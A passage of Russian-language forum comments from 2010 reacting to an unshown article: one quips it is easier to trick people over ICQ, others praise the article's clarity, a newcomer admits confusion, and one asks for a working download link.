гораздо проще по развести по аське.
(блондинок)

HIMIKAT
17.04.2010, 17:05
Статья несомненно good. Думаю должен понять, даже тот кто никогда с этим дела не имел. Все очень хорошо разжёвано и объяснено.

Prosto_GoD
03.06.2010, 20:05
блиин я новичек нифига не втыкаюсь (((( лан поучусь еще на чем нибудь другом потом приду ставлю + надеюсь в будущем поможет мне )

AppS
04.06.2010, 00:29
Скинте линк откуда скачать можно, а то все битые;(